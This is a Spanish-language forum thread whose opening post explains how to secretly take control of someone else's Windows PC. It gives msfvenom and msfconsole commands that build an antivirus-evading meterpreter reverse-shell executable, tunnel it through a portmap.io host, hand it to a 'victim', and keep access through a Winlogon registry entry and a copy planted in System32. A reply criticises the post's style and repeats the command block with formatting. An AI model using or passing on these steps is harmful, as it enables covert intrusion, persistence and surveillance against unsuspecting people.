Loading

¡Bienvenido!

Al registrarte con nosotros, podrás discutir, compartir y enviar mensajes privados con otros miembros de nuestra comunidad.

¡Regístrate ahora!

¿Te gustaría tener el control total de una PC remota sin que lo sepan?

%Unknown%

Nivel 2
Mensajes
83
Puntos de reacción
0
Esta imagen, es de un post anterior, en ella se puede observar la interfaz de red creada
a partir de una VPN que llame al ser descargada de portmap.io con el comando
sudo openvpn ¨Downloads/Usuario.first.ovpn¨
use esa IP que se me creo nueva para generar el exploit con ella.
Para crear el .exe de 72.64 KB que el antivirus no ve use esta configuración
msfvenom -p windows/meterpreter/reverse_tcp lhost=usuarioMio.portmap.host lport=(Puerto publico que aparece en mi cuenta portmap) -f exe >/home/kali/Desktop/trampa.exe
despues escribi en la consola msfconsole
despues escribi
use exploit/multi/handler
set payload windows meterpreter/reverse_tcp
set lhost (aqui va la ip que creó portmap, es la nueva interfaz de red que se ve en la foto, la 10.9.34.162)
set lport (aqui va el puerto que elegimos nosotros en portmap, no el publico, es otro que hay que poner obligatorio, cuando lo hagas tu lo veras)
exploit
despues darle el ejecutable a la victima o ponerselo
se nos abrira una sesion
ponemos pwd para ver en que directorio estamos
cd /windows/system32
upload /home/kali/Desktop/Ataque.exe
ahora presionamos Control + C para salirnos de su pc
ahora decimos:
use exploit/windows/local/ask
set session 1 # o la que tengamos nosotros, que las listamos diciendo sessions
despues ponemos shell
despues escribimos esto reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Usernit /d "Usernit.exe, Ataque.exe" /f # aqui va el nombre del payload
yo le puse ataque
la session se va a cerrar entonces para volvernos a meter en su computadora repetimos esto
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost (La misma IP de arriba)
set lport (El mismo puerto de arriba)
exploit
Lo que acaba de pasar es que cada vez que la victima encienda la computadora el exploit se cargara en su pc junto con el
inicio de sesion winlogon, ademas, la victima puede borrar el payload sospechoso, ya tendra uno en el System32

1.webp

3.webp

hacker.webp

Sin título.webp
 
Hi

Justo estabas comentando la poca aceptación que tienen tus temas y ahora que encuentro uno quiero compartir comentarios constructivos. Toma mis palabras como las de un amigo que quiere verte mejorar.



Neil deGrasse Tyson — uno de los astrofísicos más famosos del mundo — dijo en una clase sobre comunicación: "No basta con tener razón, también hay que ser eficaz".

Yo sé que tienes el conocimiento, amigo, pero para crear un tutorial/guía/tema tener conocimiento no es suficiente, también hay que saber comunicarlo de manera efectiva.

Este post es una basura. Veamos por qué:

1- El título es clickbait
Tú lo sabes, w1re's iconw1re lo sabe, yo lo sé, todos lo sabemos.

2- Faltan montones de explicaciones
Cuando crees un tema tienes que pensar para qué tipo de lector vas a escribir, ¿novatos?, ¿veteranos?

Comienzas lanzando comandos en la CLI como si todos tuvieran Kali Linux o al menos supieran qué es Metasploit. Cualquier novato que intente seguir tus pasos irá de un error a otro y pasará más tiempo en Google que en tu publicación.

Si el artículo es para usuarios avanzados, los newbies (y a veces también los usuarios avanzados) te agradecerán que al menos dejes un enlace a un tutorial sobre cómo instalar cada una de las herramientas que utilizas.

3- El formato del texto es terrible
Oraciones apiladas unas sobre otras y otras sobre comandos (¡escritos en texto plano!).

XenForo tiene a tu disposición una gran variedad de códigos BB para que puedas crear contenido legible, fácil de entender y, por qué no, más atractivo. Incluso tienen syntax highlighting. Por favor, ¡ÚSALOS! -> https://xenforo.com/community/help/bb-codes/

Para que entiendas la COLOSAL diferencia, tomaré un fragmento de tu guía y — sin editar ni una sola palabra — le daré algo de formato.



FRAGMENTO ORIGINAL:

Para crear el .exe de 72.64 KB que el antivirus no ve use esta configuración
msfvenom -p windows/meterpreter/reverse_tcp lhost=usuarioMio.portmap.host lport=(Puerto publico que aparece en mi cuenta portmap) -f exe >/home/kali/Desktop/trampa.exe
despues escribi en la consola msfconsole
despues escribi
use exploit/multi/handler
set payload windows meterpreter/reverse_tcp
set lhost (aqui va la ip que creó portmap, es la nueva interfaz de red que se ve en la foto, la 10.9.34.162)
set lport (aqui va el puerto que elegimos nosotros en portmap, no el publico, es otro que hay que poner obligatorio, cuando lo hagas tu lo veras)
exploit
despues darle el ejecutable a la victima o ponerselo



FRAGMENTO EDITADO:

Para crear el ".exe" de 72.64 KB que el antivirus no ve use esta configuración:
Bash:
msfvenom -p windows/meterpreter/reverse_tcp lhost=usuarioMio.portmap.host lport=Puerto_publico_que_aparece_en_mi_cuenta_portmap -f exe >/home/kali/Desktop/trampa.exe

despues escribi en la consola:
Bash:
msfconsole

despues escribi:
Bash:
use exploit/multi/handler
set payload windows meterpreter/reverse_tcp
set lhost # (aqui va la ip que creó portmap, es la nueva interfaz de red que se ve en la foto, la 10.9.34.162)
set lport # (aqui va el puerto que elegimos nosotros en portmap, no el publico, es otro que hay que poner obligatorio, cuando lo hagas tu lo veras)
exploit

despues darle el ejecutable a la victima o ponerselo



¡Eso es todo!

Finalmente, te pido que no pierdas la motivación por aprender y compartir.

Reflexiona sobre los comentarios que recibes de tus lectores y mejora. Hazlo por ti, y por ellos.

¡Espero con ansias tu próxima publicación!
 
Atrás